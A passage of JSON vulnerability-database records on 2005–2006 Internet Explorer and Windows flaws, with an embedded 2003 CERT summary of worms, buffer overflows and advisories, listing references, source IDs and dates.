"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"id": "VAR-200604-0209",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17293"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T19:40:25.577000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/17450"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/503124"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1677"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1711"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a787"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015900"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25542"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/959049"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
},
{
"trust": 0.9,
"url": "http://www.sec-consult.com/184.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19583/"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/917077.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18680/"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/com/default.mspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/159621"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/216434"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/391803"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/939605"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/740372"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16373/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19269/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/918165"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19606/"
},
{
"trust": 0.8,
"url": "http://jeffrey.vanderstad.net/grasshopper/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19378/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17181 "
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/680526"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16480/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14594"
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21895"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/15891/ "
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14087"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21193"
},
{
"trust": 0.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta06-101a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta06-101a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1185"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/641460\u003e"
},
{
"trust": 0.1,
"url": "https://update.microsoft.com/microsoftupdate\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/984473\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/341028\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/234812\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/434641\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/824324\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/503124\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/876678\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/959049\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/15891/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-03-23T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2005-08-19T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#503124"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-08-18T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17293"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17450"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"date": "2006-04-12T04:12:55",
"db": "PACKETSTORM",
"id": "45345"
},
{
"date": "2005-07-01T23:31:00",
"db": "PACKETSTORM",
"id": "38386"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2007-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-05-15T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#503124"
},
{
"date": "2006-04-12T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-10-13T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2018-10-12T00:00:00",
"db": "VULHUB",
"id": "VHN-17293"
},
{
"date": "2006-04-11T22:17:00",
"db": "BID",
"id": "17450"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"date": "2021-07-23T12:17:15.613000",
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RDS.Dataspace ActiveX control bypasses ActiveX security model",
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
}
}
VAR-200003-0033
Vulnerability from variot - Updated: 2024-07-22 21:37The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.
There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.
VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807
There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack.
Please check the vulnerability notes for resolutions and additional details.
Thank you. -----BEGIN PGP SIGNED MESSAGE-----
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange. We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. Exploitation of Internet Explorer Vulnerability
The CERT/CC received a number of reports indicating that attackers
were actively exploiting the Microsoft Internet Explorer
vulnerability described in VU#865940. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags.
CERT Advisory IN-2003-04
Exploitation of Internet Explorer Vulnerability
http://www.cert.org/incident_notes/IN-2003-04.html
Vulnerability Note VU#865940
Microsoft Internet Explorer does not properly evaluate
"application/hta" MIME type referenced by DATA attribute
of OBJECT element
http://www.kb.cert.org/vuls/id/865940
6. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Congressional Testimony http://www.cert.org/congressional_testimony * Training Schedule http://www.cert.org/training/ * CSIRT Development http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright \xa92003 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8
iQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78 7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT rb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU UENALuNdthA= =DD60 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200003-0033",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 2.4,
"vendor": "microsoft",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
